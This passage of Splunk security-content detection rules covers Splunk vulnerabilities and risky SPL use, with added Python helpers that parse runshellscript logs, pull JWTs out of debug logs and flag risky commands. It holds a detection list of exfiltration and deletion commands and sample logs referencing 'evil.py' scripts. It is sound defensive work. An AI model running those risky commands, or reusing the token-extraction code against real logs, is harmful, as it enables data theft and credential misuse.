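# ten-argument form are assumptions taken from the SPL, not from Splunk documentation.
SAMPLE_LOGS = [
    ("sh01", r"2024-04-17 10:00:01,000 INFO runshellscript: ['python', 'C:\\Program Files\\Splunk\\etc\\apps\\x\\bin\\alert.py', '3', 'q', 'alert', 'a', 'b', 'sid', 'search', 'path']"),
    ("sh01", r"2024-04-17 10:00:02,000 INFO runshellscript: ['python', 'D:\\share\\evil.py', '3', 'q', 'alert', 'a', 'b', 'sid', 'search', 'path']"),
    ("sh02", r"2024-04-17 10:00:03,000 INFO runshellscript: ['python', '\\\\fileserver\\drop\\evil.py', '3', 'q', 'alert', 'a', 'b', 'sid', 'search', 'path']"),
    ("sh02", r"2024-04-17 10:00:04,000 INFO runshellscript: ['python', 'D:\\other.py', 'only', 'four']"),
    ("sh02", r"2024-04-17 10:00:05,000 INFO something unrelated, with a comma"),
]

RUNSHELLSCRIPT_RE = re.compile(r"runshellscript: (\[.*\])\s*$")
EXPECTED_ARGC = 10                                      # the search only keeps the ten-argument form
LOCAL_DRIVE_RE = re.compile(r"^\s*C:", re.IGNORECASE)   # scripts on the Splunk host's own drive are expected


def parse_runshellscript(line: str) -> Optional[List[str]]:
    """Return the argument list of a runshellscript event, or None if the line is not one.

    ast.literal_eval parses the list repr properly, so commas, quotes and backslashes inside a path
    cannot shift argument positions the way the replace()/split() chain in the SPL allows.
    """
    m = RUNSHELLSCRIPT_RE.search(line)
    if not m:
        return None
    try:
        args = ast.literal_eval(m.group(1))
    except (ValueError, SyntaxError):
        return None
    if not isinstance(args, list) or not all(isinstance(a, str) for a in args):
        return None
    return args


def off_drive_target(args: List[str]) -> Optional[Tuple[str, str]]:
    """(interpreter, target_script) when the script lives off the C: drive, else None."""
    if len(args) != EXPECTED_ARGC:
        return None
    interpreter, target = args[0], args[1]
    if LOCAL_DRIVE_RE.match(target):
        return None
    return interpreter, target


def find_off_drive_scripts(logs) -> Dict[Tuple[str, str, str], int]:
    """Count hits by (splunk_server, interpreter, target_script), like the stats clause in the search."""
    counts: Counter = Counter()
    for server, line in logs:
        args = parse_runshellscript(line)
        if args is None:
            continue
        hit = off_drive_target(args)
        if hit is not None:
            counts[(server, *hit)] += 1
    return dict(counts)


if __name__ == "__main__":
    for key, n in find_off_drive_scripts(SAMPLE_LOGS).items():
        print(n, *key)
```

The UNC path in the third sample is the case worth keeping in mind when triaging: a script on a network share is "a separate disk" just as much as D: is, and nothing in the ten-argument check distinguishes the two.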
action.escu.creation_date = 2022-08-02
action.escu.modification_date = 2022-08-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Potential exposure of environment variables from url embedded in dashboard
action.risk.param._risk = [{"risk_object_field": "author", "risk_object_type": "other", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-37438"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Splunk drilldown vulnerability disclosure in the Dashboard application that can potentially allow exposure of tokens from privileged users. An attacker can create a dashboard, share it with a privileged user (admin) and detokenize variables using external URLs within the dashboard drilldown function.
action.notable.param.rule_title = Splunk Account Discovery Drilldown Dashboard Disclosure
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | rest splunk_server=local /servicesNS/-/-/data/ui/views | search eai:data="*$env:*" eai:data="*url*" eai:data="*options*" | rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML" | fields Author Permissions App "Dashboard XML" | `splunk_account_discovery_drilldown_dashboard_disclosure_filter`

[ESCU - Splunk App for Lookup File Editing RCE via User XSLT - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
action.escu.how_to_implement = Because there is no way to detect the payload, this search only provides the ability to monitor the creation of lookups, which are the base of this exploit. An operator must then investigate suspicious lookups. This search requires the ability to perform REST queries. Note that if the Splunk App for Lookup File Editing is not, or was not, installed in the Splunk environment then it is not necessary to run the search, as the environment was not vulnerable.
action.escu.known_false_positives = This search will provide information for investigation and hunting of lookup creation via user-supplied XSLT, which may be an indication of possible exploitation. There will be false positives as it is not possible to detect the payload executed via this exploit.
action.escu.creation_date = 2023-11-16
action.escu.modification_date = 2023-11-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk App for Lookup File Editing RCE via User XSLT - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk App for Lookup File Editing RCE via User XSLT - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 2, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | rest splunk_server=local /services/data/lookup-table-files/ | fields title author disabled eai:acl.app eai:acl.owner eai:acl.sharing eai:appName eai:data | `splunk_app_for_lookup_file_editing_rce_via_user_xslt_filter`

[ESCU - Splunk Authentication Token Exposure in Debug Log - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1654"], "nist": ["DE.CM"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG.
action.escu.how_to_implement = Requires access to internal Splunk indexes.
action.escu.known_false_positives = Only applies to affected versions of Splunk Enterprise below 9.2.1, 9.1.4, and 9.0.9
action.escu.creation_date = 2024-03-18
action.escu.modification_date = 2024-03-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Authentication Token Exposure in Debug Log - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Possible JsonWebToken exposure, please investigate affected $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Authentication Token Exposure in Debug Log - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-29945"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1654"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection search finds exposed authentication tokens in debug logs. This issue occurs in Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, which may be affected by a vulnerability where JsonWebTokens can be exposed if the log level is set to DEBUG.
action.notable.param.rule_title = Splunk Authentication Token Exposure in Debug Log
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd` component=JsonWebToken log_level=DEBUG eventtype="splunkd-log" event_message="Validating token:*" | rex "Validating token: (?<token>.*)\.$" | search token!=None | stats count min(_time) as firstTime max(_time) as lastTime values(log_level) as log_level values(event_message) as event_message by index, sourcetype, host, token | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_authentication_token_exposure_in_debug_log_filter`

[ESCU - Splunk Code Injection via custom dashboard leading to RCE - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This hunting search provides information about a vulnerability in Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, where an authenticated user can execute arbitrary code via the dashboard PDF generation component. Please review events with file=export in the _internal index for the potential targets of exploitation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This hunting search provides information about a vulnerability in Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, where an authenticated user can execute arbitrary code via the dashboard PDF generation component. Please review events with file=export in the _internal index for the potential targets of exploitation.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index.
action.escu.known_false_positives = Not all exports and downloads are malicious; special attention must also be paid to /en-US/splunkd/__raw/services/pdfgen/render in the context of this search.
action.escu.creation_date = 2022-10-11
action.escu.modification_date = 2022-10-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Code Injection via custom dashboard leading to RCE - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk Code Injection via custom dashboard leading to RCE - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43571"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
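To show what the Splunk Authentication Token Exposure in Debug Log detection above actually recovers, here is an added Python example that is not code from the security_content repository or from Splunk. It pulls the token out of constructed splunkd DEBUG lines using the same `Validating token: ...` anchor as the search's rex, drops the literal `None` the search filters out, and decodes the JWT header and payload without any key, which is exactly why a DEBUG-level log of a valid token is a credential leak. The sample tokens are minted inline with an HMAC over a made-up secret purely so the sample is self-consistent; the surrounding log-line layout is an assumption, not a documented Splunk format.

```python
import base64
import hashlib
import hmac
import json
import re
from typing import Dict, Optional

# Same anchor the rex in the search uses: the token runs up to a trailing full stop.
TOKEN_RE = re.compile(r"Validating token: (?P<token>\S+)\.$")


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def mint_demo_jwt(claims: dict, secret: bytes) -> str:
    """Constructed HS256 token so the sample log is self-consistent; real tokens are issued by splunkd."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


DEMO_SECRET = b"not-a-real-splunk-signing-secret"   # made up; never taken from a real deployment
ADMIN_TOKEN = mint_demo_jwt({"sub": "admin", "aud": "splunk", "exp": 1744000000}, DEMO_SECRET)
SVC_TOKEN = mint_demo_jwt({"sub": "svc-ingest", "aud": "splunk", "exp": 1744003600}, DEMO_SECRET)

# Constructed (host, splunkd.log line) pairs. Only the "Validating token: <jwt>." tail mirrors the
# search; the rest of the line layout is an assumption, not a documented Splunk format.
SAMPLE_LOGS = [
    ("sh01", f"04-17-2024 10:00:01.000 +0000 DEBUG JsonWebToken [1 TcpChannelThread] - Validating token: {ADMIN_TOKEN}."),
    ("sh01", "04-17-2024 10:00:02.000 +0000 DEBUG JsonWebToken [1 TcpChannelThread] - Validating token: None."),
    ("sh02", f"04-17-2024 10:00:03.000 +0000 DEBUG JsonWebToken [1 TcpChannelThread] - Validating token: {SVC_TOKEN}."),
    ("sh02", f"04-17-2024 10:00:04.000 +0000 DEBUG JsonWebToken [1 TcpChannelThread] - Validating token: {ADMIN_TOKEN}."),
    ("sh02", "04-17-2024 10:00:05.000 +0000 INFO  JsonWebToken [1 TcpChannelThread] - Token validated for user=admin."),
]


def extract_token(line: str) -> Optional[str]:
    """Token from a DEBUG-level line, or None; the literal 'None' the search filters out maps to None too."""
    if " DEBUG " not in line:
        return None
    m = TOKEN_RE.search(line)
    if not m or m.group("token") == "None":
        return None
    return m.group("token")


def decode_claims(token: str) -> dict:
    """Header and payload are plain base64url JSON: whoever can read the log can read them, no key needed."""
    header, payload, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header)), "payload": json.loads(b64url_decode(payload))}


def redact(token: str) -> str:
    """Correlation handle for a ticket: a short prefix plus a hash, never the full credential again."""
    return f"{token[:12]}...sha256:{hashlib.sha256(token.encode()).hexdigest()[:16]}"


def exposed_tokens(logs) -> Dict[str, dict]:
    """Per leaked token (keyed by its redacted form): subject, expiry, count and the hosts that logged it."""
    summary: Dict[str, dict] = {}
    for host, line in logs:
        token = extract_token(line)
        if token is None:
            continue
        claims = decode_claims(token)["payload"]
        entry = summary.setdefault(redact(token), {"sub": claims.get("sub"), "exp": claims.get("exp"),
                                                    "hosts": set(), "count": 0})
        entry["hosts"].add(host)
        entry["count"] += 1
    return summary
```

Any token recovered this way should be treated as compromised and revoked; the `exp` claim tells you how long the exposure window stays open if it is not, and the redacted key is what belongs in the ticket, since pasting the raw token into a case system leaks it a second time.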
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_ui` uri_path=*/data/ui/views/* OR uri_path=*saved/searches/* | dedup uri_path | eval URL=urldecode(uri_path) | rex field=URL "\/saved\/searches\/(?<NAME>[^\/]*)" | rex field=URL "\/data\/ui\/views\/(?<NAME1>[^\/]*)" | eval NAME=NAME."( Saved Search )",NAME1=NAME1."( Dashboard )" | eval NAME=coalesce(NAME,NAME1) | eval STATUS=case(match(status,"2\d+"),"SUCCESS",match(status,"3\d+"),"REDIRECTION",match(status,"4\d+") OR match(status,"5\d+"),"ERROR") | stats list(NAME) as DASHBOARD_TITLE,list(method) as HTTP_METHOD,list(status) as Status_Code,list(STATUS) as STATUS by user | rename user as User | `splunk_code_injection_via_custom_dashboard_leading_to_rce_filter`

[ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of the risky command - Delete - that may be utilized in Splunk to delete some or all data queried for. In order to use Delete in Splunk, one must be assigned the can_delete role. This is typically not used and should generate an anomaly if it is used.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = The following analytic identifies the use of the risky command - Delete - that may be utilized in Splunk to delete some or all data queried for. In order to use Delete in Splunk, one must be assigned the can_delete role. This is typically not used and should generate an anomaly if it is used.
action.escu.how_to_implement = To successfully implement this search, acceleration is recommended against the Search_Activity data model, which runs against the Splunk _audit index. In addition, this analytic requires the Common Information Model App, which includes the Splunk Audit data model https://splunkbase.splunk.com/app/1621/.
action.escu.known_false_positives = False positives may be present if this command is used as a common practice. Filter as needed.
action.escu.creation_date = 2022-05-27
action.escu.modification_date = 2022-05-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = $user$ executed the 'delete' command, if this is unexpected it should be reviewed.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 27}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Delete Usage - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "cve": ["CVE-2022-32154"], "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search IN ("*| delete*") Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_command_and_scripting_interpreter_delete_usage_filter`

[ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule]
action.escu = 0
action.escu.enabled = 1
description = The Splunk platform contains built-in search processing language (SPL) safeguards to warn you when you are about to unknowingly run a search that contains commands that might be a security risk. This warning appears when you click a link or type a URL that loads a search that contains risky commands. The warning does not appear when you create ad hoc searches. This warning alerts you to the possibility of unauthorized actions by a malicious user. Unauthorized actions include copying or transferring data (data exfiltration), deleting data and overwriting data. All risky commands may be found here https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga. A possible scenario when this might occur is when a malicious actor creates a search that includes commands that exfiltrate or damage data. The malicious actor then sends an unsuspecting user a link to the search. The URL contains a query string (q) and a search identifier (sid), but the sid is not valid. The malicious actor hopes the user will use the link and the search will run. During analysis, pivot based on user name and filter out any users or queries not needed. Queries run from a dashboard are seen as ad hoc queries; when a query runs from a dashboard, the audittrail logs will not show the source dashboard name. The query defaults to search_type adhoc and excludes Splunk system user activity. In addition, modify this query by removing key commands that generate too much noise, or too little, and create separate queries with higher confidence to alert on.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = The Splunk platform contains built-in search processing language (SPL) safeguards to warn you when you are about to unknowingly run a search that contains commands that might be a security risk. This warning appears when you click a link or type a URL that loads a search that contains risky commands. The warning does not appear when you create ad hoc searches. This warning alerts you to the possibility of unauthorized actions by a malicious user. Unauthorized actions include copying or transferring data (data exfiltration), deleting data and overwriting data. All risky commands may be found here https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga. A possible scenario when this might occur is when a malicious actor creates a search that includes commands that exfiltrate or damage data. The malicious actor then sends an unsuspecting user a link to the search. The URL contains a query string (q) and a search identifier (sid), but the sid is not valid. The malicious actor hopes the user will use the link and the search will run. During analysis, pivot based on user name and filter out any users or queries not needed. Queries run from a dashboard are seen as ad hoc queries; when a query runs from a dashboard, the audittrail logs will not show the source dashboard name. The query defaults to search_type adhoc and excludes Splunk system user activity. In addition, modify this query by removing key commands that generate too much noise, or too little, and create separate queries with higher confidence to alert on.
action.escu.how_to_implement = To successfully implement this search, acceleration is recommended against the Search_Activity data model, which runs against the Splunk _audit index. In addition, this analytic requires the Common Information Model App, which includes the Splunk Audit data model https://splunkbase.splunk.com/app/1621/. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance, such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks.
action.escu.known_false_positives = False positives will be present until properly filtered by user name and search name.
action.escu.creation_date = 2022-05-23
action.escu.modification_date = 2022-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154", "CVE-2024-29946"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search IN ("*| runshellscript *", "*| collect *","*| delete *", "*| fit *", "*| outputcsv *", "*| outputlookup *", "*| run *", "*| script *", "*| sendalert *", "*| sendemail *", "*| tscolle*") Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_command_and_scripting_interpreter_risky_commands_filter`

[ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection utilizes a machine learning model named "risky_command_abuse" trained by the "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline" search. It should be scheduled to run hourly to detect whether a user has run searches containing risky SPL from this list https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga with an abnormally long running time in the past hour, compared with that user's past seven days of history. This search uses the trained baseline to infer whether a search is an outlier (isOutlier ~= 1.0) or not (isOutlier ~= 0.0).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = This detection utilizes a machine learning model named "risky_command_abuse" trained by the "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline" search. It should be scheduled to run hourly to detect whether a user has run searches containing risky SPL from this list https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga with an abnormally long running time in the past hour, compared with that user's past seven days of history. This search uses the trained baseline to infer whether a search is an outlier (isOutlier ~= 1.0) or not (isOutlier ~= 0.0).
action.escu.how_to_implement = This detection depends on the MLTK app, which can be found here - https://splunkbase.splunk.com/app/2890/, and the Splunk Audit data model, which can be found here - https://splunkbase.splunk.com/app/1621/. The baseline model needs to be built using "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline" before this search can run. Please note that the current search only matches searches with exactly one space between the pipe and the risky command.
action.escu.known_false_positives = If the run time of a search exceeds the outlier boundaries defined by the fitted density function model, false positives can occur, incorrectly labeling a long-running search as potentially risky.
action.escu.creation_date = 2022-05-27
action.escu.modification_date = 2022-05-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Abnormally long run time for risky SPL command seen by user $Search_Activity.user$.
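The three audit-trail detections above (Delete Usage, Risky Commands and the MLTK variant) all match risky commands with `*| delete *`-style wildcards, which, as the MLTK implementation note says, only hits exactly one space between the pipe and the command. As an added Python example that is not code from the security_content repository, this splits a constructed set of audit `search` strings on pipes that sit outside double quotes and outside `[...]` subsearches (so a `|` inside a quoted string does not start a stage, while a subsearch's own stages are still inspected), reads the first word of each stage, and reports which risky commands were used regardless of spacing. The risky-command set is the one the searches above enumerate; the user names and sample searches are made up.

```python
import re
from typing import Dict, List, Set, Tuple

# The command list the searches above enumerate ("tscolle*" in the SPL is the prefix of tscollect).
RISKY_COMMANDS = {"runshellscript", "collect", "delete", "fit", "outputcsv", "outputlookup",
                  "run", "script", "sendalert", "sendemail", "tscollect"}

SUBSEARCH_RE = re.compile(r"\[([^\[\]]*)\]")   # innermost [...] bodies within one stage


def split_stages(spl: str) -> List[str]:
    """Split SPL on pipes that are outside double quotes and outside [...] subsearches.

    A '|' inside a quoted string or a subsearch does not start a new stage, but each subsearch body
    is split in turn, so '... [search x | delete]' still yields a 'delete' stage.
    """
    stages: List[str] = []
    buf: List[str] = []
    depth = 0
    in_str = False
    i = 0
    while i < len(spl):
        ch = spl[i]
        if in_str:
            buf.append(ch)
            if ch == "\\" and i + 1 < len(spl):   # keep an escaped character such as \" verbatim
                i += 1
                buf.append(spl[i])
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            buf.append(ch)
        elif ch == "[":
            depth += 1
            buf.append(ch)
        elif ch == "]":
            depth = max(depth - 1, 0)
            buf.append(ch)
        elif ch == "|" and depth == 0:
            stages.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    stages.append("".join(buf))
    expanded: List[str] = []
    for stage in stages:
        expanded.append(stage)
        for body in SUBSEARCH_RE.findall(stage):
            expanded.extend(split_stages(body))
    return expanded


def leading_command(stage: str) -> str:
    """First word of a stage, lower-cased, whatever whitespace follows the pipe."""
    m = re.match(r"\s*([A-Za-z_][A-Za-z0-9_]*)", stage)
    return m.group(1).lower() if m else ""


def risky_commands_in(spl: str) -> Set[str]:
    return {cmd for cmd in map(leading_command, split_stages(spl)) if cmd in RISKY_COMMANDS}


# Constructed audittrail-style records: (user, search_type, search). Users and searches are made up.
SAMPLE_AUDIT = [
    ("alice", "adhoc", "search index=web status=500 | stats count by host"),
    ("bob", "adhoc", "search index=web host=bad | delete"),                          # the one-space form the SPL matches
    ("bob", "adhoc", "search index=web host=bad|delete"),                            # no space: '*| delete *' misses it
    ("carol", "adhoc", "search index=finance | outputcsv   q1_dump.csv"),            # extra spaces: missed as well
    ("dave", "adhoc", 'search index=web msg="pipe | delete in a string" | head 5'),  # no real delete stage
    ("erin", "adhoc", "search index=web [search index=ids | collect index=summary] | table _time"),
    ("splunk-system-user", "scheduled", "search index=_internal | delete"),           # excluded, as in the SPL
]


def risky_searches(records) -> Dict[str, List[Tuple[str, Set[str]]]]:
    """Per user, the ad hoc searches (splunk-system-user excluded) that use a risky command."""
    hits: Dict[str, List[Tuple[str, Set[str]]]] = {}
    for user, search_type, spl in records:
        if search_type != "adhoc" or user == "splunk-system-user":
            continue
        found = risky_commands_in(spl)
        if found:
            hits.setdefault(user, []).append((spl, found))
    return hits
```

Run against the constructed records, bob's no-space `|delete` and carol's triple-spaced `outputcsv` are reported even though the wildcard patterns in the searches above would miss both, dave's quoted pipe is correctly ignored, and erin's `collect` inside a subsearch is still found. The same command list can be fed back into the `IN (...)` clause above once you decide which spacing variants you want the scheduled search to match.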
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule
